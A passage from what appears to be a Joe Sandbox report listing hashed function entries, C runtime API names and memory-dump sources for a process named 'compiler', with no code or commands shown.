                                                            • Opcode Fuzzy Hash: 016bd4abb82d9b53c550d9874fae25368a291ec228e867b8fc9ac5df5330fa95
                                                            • Instruction Fuzzy Hash: 1981C232D0C302A9F7657E2C8750338EA90EF3B744FD452B5EF4D8219CDA2EA8419B21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 00d4f6fbcc0b86b5737d05fbe3e8c8b52d55eb691c94426ea1fd48ac158370db
                                                            • Instruction ID: a15a1bbf6b3b74aa8d27ecef22f08f4657390e1b1a374e48d44b9c4810534a69
                                                            • Opcode Fuzzy Hash: 00d4f6fbcc0b86b5737d05fbe3e8c8b52d55eb691c94426ea1fd48ac158370db
                                                            • Instruction Fuzzy Hash: 5B818DB690824286FB64BF2D80449BDB7A0EB23F58F9401B5CF4D4629EDE39E481C775
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 7989a09cc460249dc64a8cc5481ffcab55902b17f0bef9661494f5c7cd2f6134
                                                            • Instruction ID: f7acbbb5e6e24f587a9b60ee789478bdac77d397da564e975858d1a96201d301
                                                            • Opcode Fuzzy Hash: 7989a09cc460249dc64a8cc5481ffcab55902b17f0bef9661494f5c7cd2f6134
                                                            • Instruction Fuzzy Hash: 5A8181F280825285FBA4BF2D80549BDB7A0EB23B58FD401B5DF594629EDE39E441CB34
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 6f48534bd8d2da33e8a64d5d4553e022d1d8de24cca7944cf78ce6d89aac79ee
                                                            • Instruction ID: 24b0296cea7e49f9e6cecc63c8f4ee6ce324bcae2cc57e087c693b626cd87fde
                                                            • Opcode Fuzzy Hash: 6f48534bd8d2da33e8a64d5d4553e022d1d8de24cca7944cf78ce6d89aac79ee
                                                            • Instruction Fuzzy Hash: A481617690C28286FB64BE2D40445BCFBA1EBA7B48F9401BDCF494639DCE39E445CB21
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 487deaacb9114b386305e53eb4ecc5f992b2020c04d1230510f6bf9bb921c12c
                                                            • Instruction ID: 449c542847401afb301b42683cdff1d8e1b95f63bcfd6d0946e1a98892fbdfd5
                                                            • Opcode Fuzzy Hash: 487deaacb9114b386305e53eb4ecc5f992b2020c04d1230510f6bf9bb921c12c
                                                            • Instruction Fuzzy Hash: 6C81607690C64286F764BF2D804457CBBA0EBA7B08F9402B9DF494629DCF39E441CB35
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: "$sinh
                                                            • API String ID: 1156100317-1232919748
                                                            • Opcode ID: 1b7f2a28658e851d18b3e1d344bf4723efcb843dfa7aff974d4ddff1f88f913e
                                                            • Instruction ID: ffca4cc118c58a6c7ba64352341c102d13a80a9c9814fc9db89c432753e9cb5c
                                                            • Opcode Fuzzy Hash: 1b7f2a28658e851d18b3e1d344bf4723efcb843dfa7aff974d4ddff1f88f913e
                                                            • Instruction Fuzzy Hash: E6919421E18F8188E263AB38A441376B358EF77395F519377EA8E35A5DDF2CA1438710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 8f68f425e7cb7e31de09a4e8309823c8fce73fa23a67521ed41888ec4eb7866a
                                                            • Instruction ID: 75b94bf5f780719b41c532e0202b7e982e103c0cedc8be23b5710a893ddbb7ed
                                                            • Opcode Fuzzy Hash: 8f68f425e7cb7e31de09a4e8309823c8fce73fa23a67521ed41888ec4eb7866a
                                                            • Instruction Fuzzy Hash: FD61557290C24186F7A9BE2C805877DB7A1EBABB19FD511BDCF4A0219DCF28D845C621
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 5923f8ead6b8f065035d94a0e2b87c190eb5860a57fedfb4d9006a879b2eb152
                                                            • Instruction ID: 35663792eb19e1ab754cf1ba68a6fe21a28fb7ce19f8d58fadddcdd3a3f863bc
                                                            • Opcode Fuzzy Hash: 5923f8ead6b8f065035d94a0e2b87c190eb5860a57fedfb4d9006a879b2eb152
                                                            • Instruction Fuzzy Hash: 2561757290C2428AF764BE2D8059BBCB7A1EBA7B18F9411BDCF4A4129DCF38D545C721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: $*
                                                            • API String ID: 3215553584-3982473090
                                                            • Opcode ID: 2da02ced6c2e1e19490a68693a05258c61f8e5acf6284ee305ebd8c9268361d2
                                                            • Instruction ID: 49206168c80d69fc7193b847506a260c9c6611375f7e1088b05ee88a51d00ead
                                                            • Opcode Fuzzy Hash: 2da02ced6c2e1e19490a68693a05258c61f8e5acf6284ee305ebd8c9268361d2
                                                            • Instruction Fuzzy Hash: 586161B290C64286F764BE2C815877DBBA1EB67B49F9411B5CF4E422DECF39D481C620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$acos
                                                            • API String ID: 1156100317-2870037509
                                                            • Opcode ID: f2aea4717332eacf9599787777cac4930881c66dd4f74aac74544474ac18fe70
                                                            • Instruction ID: 36809019a83763a508fc1e18a7f386070affdb92b6430c29e74c98cb262d5834
                                                            • Opcode Fuzzy Hash: f2aea4717332eacf9599787777cac4930881c66dd4f74aac74544474ac18fe70
                                                            • Instruction Fuzzy Hash: 14619421D18F4589F523BB3CA45027AD654FFB7390F918376EF9E65A6CDF2CA0428610
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$e+000$gfff
                                                            • API String ID: 3215553584-2620144452
                                                            • Opcode ID: 6e4bf075dfa41e29566810b74a862345e101606eff1e5674b8854fa803e6ed6f
                                                            • Instruction ID: c1f1cef7be4dc9029d6fefed294bbac49123699c9237a876ec1221164f7b296a
                                                            • Opcode Fuzzy Hash: 6e4bf075dfa41e29566810b74a862345e101606eff1e5674b8854fa803e6ed6f
                                                            • Instruction Fuzzy Hash: EF512762B183C55AFB61AB3D944036DABA1E762B90FC89271DB9847BDECF2CD044C710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$asin
                                                            • API String ID: 1156100317-2188059690
                                                            • Opcode ID: c8cb0a8993d4168913ef16ae3364b060e8f93b962bf75556cc6919c2332f8f9f
                                                            • Instruction ID: 7459ec1b73b5c0df9897f51495aa6c83eb4ec2d1b7aac2ab4e8fffb4d687a1dd
                                                            • Opcode Fuzzy Hash: c8cb0a8993d4168913ef16ae3364b060e8f93b962bf75556cc6919c2332f8f9f
                                                            • Instruction Fuzzy Hash: 98515121D28F8585F613BB3C985037AD654EFB7390F918376EF9A75A6CDF2CA0824610
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            • Opcode ID: 68d6d60a81ec988a2ee50aff0fa4c758ac0cd894e8c1203106ca8e284750cb42
                                                            • Instruction ID: 0b135a7539a475520b37f01d44c2db8be8c1eb63e7ffe14c8ea74112f78c234e
                                                            • Opcode Fuzzy Hash: 68d6d60a81ec988a2ee50aff0fa4c758ac0cd894e8c1203106ca8e284750cb42
                                                            • Instruction Fuzzy Hash: D621273660864186E630BF19E04466EB760FB9AB61F800275DF8D0379DCF3CE886CB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$_get_daylight
                                                            • String ID:
                                                            • API String ID: 72036449-0
                                                            • Opcode ID: f4e6ab5acb3b199fd560212d424b1a072a9b0cc689206b4aa84e1670fe172725
                                                            • Instruction ID: 3cc537a11fd60d975ef1d6666e1133d91d3d60005ae31c71086a242620edb8d1
                                                            • Opcode Fuzzy Hash: f4e6ab5acb3b199fd560212d424b1a072a9b0cc689206b4aa84e1670fe172725
                                                            • Instruction Fuzzy Hash: 0751C232D0C24266F7697A2CC404379E681EB62714FD949B5DF4E872DEEE2CE84096E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3461063567-0
                                                            • Opcode ID: d7379f8e256efc8a75f31393473afb83f56ea896de2bdf121ec60c2110ebeb92
                                                            • Instruction ID: a0be0d7b65b579fe7f3cf753f345ac28539769a3612c9bb436bb13aa7867ae56
                                                            • Opcode Fuzzy Hash: d7379f8e256efc8a75f31393473afb83f56ea896de2bdf121ec60c2110ebeb92
                                                            • Instruction Fuzzy Hash: 55216B32604B8196EB24AF15E4403E9B3A1FB99784F840076EF4D4375CDF38E658C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                            • String ID:
                                                            • API String ID: 2321548817-0
                                                            • Opcode ID: 466fbf66acd44921e52936077224c3abc88eaf7d53186d7a0c54b09487fead34
                                                            • Instruction ID: c34542a284c3bac8fbcca41ac4eb61545036b2c4c0c06e30ebedd5acba8cbfdc
                                                            • Opcode Fuzzy Hash: 466fbf66acd44921e52936077224c3abc88eaf7d53186d7a0c54b09487fead34
                                                            • Instruction Fuzzy Hash: 2C118E61A0874192FB14BF2D940027CE6A1EFAABA0FD44674EF29476CDDF2CD4118721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 2947e2b11e05ee4143448a0bf40de8105c14be163486140bbdcd5b1e60f2cb2f
                                                            • Instruction ID: f81cde13589a14c6d394ddcfa97d4c980732261106b8cc4eb5a9b11ca324326f
                                                            • Opcode Fuzzy Hash: 2947e2b11e05ee4143448a0bf40de8105c14be163486140bbdcd5b1e60f2cb2f
                                                            • Instruction Fuzzy Hash: 4E7184B290865286F768BF2C805457CBBB0EB26B5CF9441B9DF4E0229EDF78D581C724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 671b90c839151866aa1ebddab602b54d62c9f0c33ebb5256414d4f66f1be25a7
                                                            • Instruction ID: 5c2673a79377cdfd4f51db9e3dee5ed3030eccf3a944334104b68105bb69a5f6
                                                            • Opcode Fuzzy Hash: 671b90c839151866aa1ebddab602b54d62c9f0c33ebb5256414d4f66f1be25a7
                                                            • Instruction Fuzzy Hash: 3D71C5B695921286F768BF3D805447CB7A4FB26B18F9501B9DF4E0229ECF38E441C724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: d635b599068aacbad0d6f1b01662b04a2818e42135e6a8fdc667eed9cb431b05
                                                            • Instruction ID: 47e326640dbbc949c27753c1dfe1cf005abf20b43adb35da970f12950101d7af
                                                            • Opcode Fuzzy Hash: d635b599068aacbad0d6f1b01662b04a2818e42135e6a8fdc667eed9cb431b05
                                                            • Instruction Fuzzy Hash: 5F71A6B290861286F764BF2C804847CB7B0FB66B58F9411B6DF4E4229DDF39D485C7A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: *
                                                            • API String ID: 3215553584-163128923
                                                            • Opcode ID: 54eece3e8767ad00d432cbf52d6f3945dcf2b3d349de7b59a167cc0f1cf879f6
                                                            • Instruction ID: 6c420d202330b66e595a444725b65bd9b49e5ff8c47f3bd41ce9f2fadd8e352d
                                                            • Opcode Fuzzy Hash: 54eece3e8767ad00d432cbf52d6f3945dcf2b3d349de7b59a167cc0f1cf879f6
                                                            • Instruction Fuzzy Hash: 4971B4F290825286F764BF2C80545BCB7A0EB27B58FD44175CF194329EDF28D841D761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00007FF7BADB16A0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADB16CE
                                                            • fwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7BAD56499
                                                              • Part of subcall function 00007FF7BADA9C78: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADA9C8C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$fwprintf
                                                            • String ID: %lf$too many arguments
                                                            • API String ID: 1510895727-3990051606
                                                            • Opcode ID: 9f15843d22a8e06c5bb73af29518dd4b88a46f6b57799560715c4884a15d187c
                                                            • Instruction ID: de37e645cf9b3696f7a8668f35b05ced0158fcc967e4028698ccea63efac24c6
                                                            • Opcode Fuzzy Hash: 9f15843d22a8e06c5bb73af29518dd4b88a46f6b57799560715c4884a15d187c
                                                            • Instruction Fuzzy Hash: 6541D321E2868641FE60BA2A9410179E791EB66BA4F984371DF6D176CDDE3CE4428320
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$fmod
                                                            • API String ID: 1757819995-3213614193
                                                            • Opcode ID: ef00379805b805cfb507051ffc9d313dbc9658f9502882dce6befe6a57f3b8e7
                                                            • Instruction ID: 82830981dfaf048d623cdad92ae3f307c91e49b548b8fe665315f3882c2a1082
                                                            • Opcode Fuzzy Hash: ef00379805b805cfb507051ffc9d313dbc9658f9502882dce6befe6a57f3b8e7
                                                            • Instruction Fuzzy Hash: 9C518012D29A8145F2237B39E0157B5EA68EFB73C4F8093B2EF4E216BDDB1DA1064210
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: U
                                                            • API String ID: 442123175-4171548499
                                                            • Opcode ID: afecaafd94b44fbe7b062941ff27cc9667c0b6e10fc8e87fafbfea2ba7f69c76
                                                            • Instruction ID: 33083f7501bf27812511495999af59420eaf51fecd7f5dbbe2aa343553c28ee9
                                                            • Opcode Fuzzy Hash: afecaafd94b44fbe7b062941ff27cc9667c0b6e10fc8e87fafbfea2ba7f69c76
                                                            • Instruction Fuzzy Hash: 5241A022A18B4595EB20AF29E8443A9A6A1FBA9794FC04135EF4D8779CEF3CD441C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: (null)
                                                            • API String ID: 3215553584-3941151225
                                                            • Opcode ID: ea62b2bd4347bb6786d3e16f4766b81d968c4a952ee6dd964228d8c49b4ba34d
                                                            • Instruction ID: 3023810cff38094b32fb9f635c8ad2896c760a56efdeff20ade1d84c73e37d66
                                                            • Opcode Fuzzy Hash: ea62b2bd4347bb6786d3e16f4766b81d968c4a952ee6dd964228d8c49b4ba34d
                                                            • Instruction Fuzzy Hash: 9A418D7290864286FB55BF2CC1446BCA7A1EB22B88FD441B9CF4D0739DDF2AE452D721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: (null)
                                                            • API String ID: 3215553584-3941151225
                                                            • Opcode ID: 102621c1cf72ef40b396114c65d8f98b51c492e9cce668a00d6a57e2478b1f53
                                                            • Instruction ID: 809aa07b9fcfbda85f590a001c6e40b14d4e1b4e96f25b97fdafcce0620ab7d3
                                                            • Opcode Fuzzy Hash: 102621c1cf72ef40b396114c65d8f98b51c492e9cce668a00d6a57e2478b1f53
